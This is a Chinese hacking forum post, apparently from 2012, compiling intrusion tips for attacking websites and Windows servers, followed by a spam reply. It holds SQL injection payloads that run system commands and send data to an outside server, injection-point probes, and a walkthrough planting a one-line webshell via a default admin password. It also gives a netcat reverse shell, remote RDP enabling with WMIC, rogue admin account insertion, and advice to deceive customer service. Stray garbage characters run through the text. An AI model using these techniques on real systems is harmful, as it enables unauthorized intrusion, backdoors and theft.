找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3501|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关( S% H) J& S! U6 {- H0 X1 P

& Z  n7 s% r; x! A& C- f7 R' {6 b3 [9 H8 p: g/ {8 h
SA点数据库分离搞法+语句:
% T/ X. Z- }# T! N" {. C% Z- n3 e, X& {7 L1 f7 V( M, }- m% g, e
注射点不显错,执行下面三条语句页面都返回正常。3 B2 h( @* a& l/ k
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')& _4 Q. V/ w: G) Q9 ]4 z( L
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')3 e- l8 l! m) x/ ~% W
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')
: O6 S( P1 o( n0 }可以列目录,判断系统为2000,web与数据库分离( R2 }* ]  [( ], h6 A
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
$ q. t- x, \% [; {/ H在注射点上执行
5 V$ }4 b9 y0 A) bdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--5 |1 @& ]8 D3 f& h, B- p
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
, x7 }6 O& U6 B7 r5 F7 m# ?; n还有我用NC监听得其他端口都没有得到IP。, a3 I) S- w9 p$ S' N" ?7 P

2 b3 v" Y! c2 r, h! p( u+ v通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。7 o) W* T( g7 x1 B
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
! K0 O2 V/ I& o
, F# _, p6 Z( ?* _, y  a9 u+ l;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--8 u* Z0 v8 j. f9 g

8 @1 v4 m. R, J0 q* i2 {. f现在就猜想是不是数据库是内网而且不能连外网。
3 K" c5 ^- b5 M! J9 n5 D. Z/ v+ D; g  R3 S& J! a, j8 Q  C+ H

" Y( `3 u' w  C/ k6 a" f7 f6 @- baccess导出txt文本代码
6 d1 N9 N% {+ I" ~SELECT * into [test.txt] in 'd:\web\' 'text;' from admin' J9 a* W/ `6 w# u/ ?

1 s' k3 W# K! P0 z4 T/ {
- C0 y4 t1 l1 A
5 d9 I1 m0 I$ h0 K自动跳转到指定网站代码头- Q+ ?& O  L5 v
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>
0 |. n4 J- X/ q$ P4 b' p) P7 t
! m. r+ V1 x: g: K% E
- j; C4 I. w1 T$ \" p入侵java or jsp站点时默认配置文件路径:
# p' z$ e# B0 g\web-inf\web.xml4 [/ S4 z8 w0 L
tomcat下的配置文件位置:' l, u) \  `1 U- a' q2 h( H4 S7 Y2 c
\conf\server.xml            (前面加上tomcat路径)0 V. w( ~- c+ }
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml4 H! p9 f2 N: q" i) D2 @. a' X6 A
! [3 E! H' i2 H8 i6 h
5 u8 C8 i! H8 \0 O0 A$ J

- J4 o: r: y, f' ^. J, P检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:% _) ?2 g1 b& w9 s* `  W
-1%23
6 F4 X' z5 k* S) v$ C7 R> ; c  Z8 }5 B1 z2 n& z  n
<
% _  {, f, C1 ]& A+ D" K& p) E: i1'+or+'1'='12 w6 t! V* z- c9 ^
id=8%bf
1 I! a% |& i$ w; h0 D' V4 f3 C6 m4 O- Y0 V" s! E; i% |8 ~) m
全新注入点检测试法:2 |. x' s, h- J5 g% F7 h3 I; Z
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。0 |) Z+ ?+ J* ^
, G8 R  s  W% z9 P6 M
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。; W  Z2 z5 v# T& u
9 c8 a* ?+ b: r6 y* c5 P
搜索型注入判断方法:
' P9 Q8 V* d' j6 V北京%' and '1'='1' and '%'='
: M  {0 M) B. t: n3 |. N4 s北京%' and '1'='2' and '%'='
' y" u$ ]$ J) V& w) A. ^+ R
( f/ k6 V& h  V1 q; U0 x, o" a' |; V, l6 ]
COOKIES注入:
# M. [) G( @' c8 h' a2 y( l+ R- k/ a* L" L9 h
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
6 X& ~' b9 h2 P: H% E9 C5 G' t+ A( ?6 f2 ]
2000专业版查看本地登录用户命令:
" r$ r: C5 ]+ K% k2 Y/ knet config workstation9 B; u' A' V0 H

5 G. a! S" v: l* s9 a2 H7 f) k1 v, u9 C: w: n  K1 ~; ^5 y
2003下查看ipsec配置和默认防火墙配置命令:
( L6 P2 @4 h, o# R3 Onetsh firewall show config/ E/ Y7 I4 g# v% C8 m$ f* o4 h' M9 U
netsh ipsec static show all4 M3 T) ^( _8 g# Z/ Y# X- s% X

$ D2 b8 X8 B+ S不指派指定策略命令:
6 I. I4 k1 s- c# P: A6 t7 tnetsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
1 e2 p" u' b% Gnetsh ipsec static show policy all  显示策略名  O5 r9 M$ J) _9 o- q
0 b) X4 y9 Y: O; ^4 d

# x9 ?  s: H9 A( ?% V: H& A猜管理员后台小技巧:
- ?- ?. G6 E# J1 b# }admin/left.asp
  p  Q- P/ T0 ~7 c  S2 Kadmin/main.asp  _: t/ M5 k$ n" k
admin/top.asp. R! C8 b& e! b; e
admin/admin.asp
; j& U8 y9 p, D! _会现出菜单导航,然后迅雷下载全部链接
& y$ h2 J/ K- O/ b& `( u& ^* \4 S8 y: y- q# |/ W

2 \/ ]" _. v5 C5 U9 }社会工程学:$ ?+ v" A+ o' j' {. o
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人& `+ ^5 K+ d  P& K5 Z1 Z$ Q; B
然后去骗客服
2 g8 s' V4 j7 c% F3 a! l7 }* s& Q. V5 N" S$ h5 d
8 p, D7 o) O5 X) P7 \& T
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 8 k$ J2 x* z: q, \/ h. T8 j
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, . m8 j. d5 H+ j- l
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。  C) i2 ?2 C& J- B% _4 Y6 @8 t+ [
4 P3 L' N" Y/ n4 f% w" `
6 G- b: R9 ~$ q* m

3 g$ o7 b0 E* d) r) k, E8 u% _6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
/ X8 Q9 U$ d; W# F/ [( K0 @. Q
' U" u% Z' X3 ^& }
6 w6 t/ w! }8 v- y. Y4 Z
  Z6 [# a) B5 x9 N: M. V4 }CMD加密注册表位置$ I: e9 P( ~' @, I) R8 U; m' ^! q% e
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
% w9 O" C+ \9 A" D& NAutoRun
1 C+ L+ F  v2 ^2 G2 \" _& t
1 V/ D5 d3 ^8 d6 `(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor3 q' ^! X3 i7 n) z& {" x& D; T( p
AutoRun
& v% b3 \7 H( d6 ^+ u
$ M6 i2 Y& ]0 t6 H. ]3 z' ^4 Y( x! d6 J6 A4 x5 a. i# Q4 K( f) e
在找注入时搜索Hidden,把他改成test, d& Z0 ~( ^! o& m0 v9 ~6 f3 A, L$ V

' S4 e9 v8 ^2 [  a5 c8 R
' T8 }, x, w  X1 P
, g# [% y3 h3 B/ O6 u, ~mstsc /v:IP /console , `! g2 U9 T) R5 ]) o
7 @) P' R6 C' s4 ?' l0 Z
" \* y" j4 ^; y7 v: _$ {
一句话开3389:
7 Q# h: H! p/ M0 a  o7 s
+ S; r. m9 ]/ F; f  ~' `3 E最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  + }% ]+ [# S8 @! u  {
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.6 B, D; R: S5 R% m/ J& ^

! H) M# m& v- N. @  m" Z0 R1 v$ Q3 X% {9 g  G1 R8 V9 N7 @
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
  U0 l( l' r9 j5 X1 rInsert into admin(user,pwd) values('test','test')$ S! k; V! |: `; m
3 g# l) G" c3 B+ u" g5 f# A

* _4 k3 C: q  m- V, cNC反弹
4 k9 e. g' i4 t3 T先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   
8 R; B0 W/ h  A! o5 t然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
3 `5 M4 ^  t8 |  B- I$ r" g: P/ s- u& `, C

# P5 V$ [; R4 M/ h7 \在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
5 g7 `0 {$ Q# e6 q0 c, t1 F: w/ T& S3 S# }, z5 q
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录& `" a. e8 Q/ {8 I. @9 Z  _: d
例如:! x4 h9 c9 y) o
subst k: d:\www\ 用d盘www目录替代k盘$ X; @. E5 H$ F$ c/ ]8 d- w
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表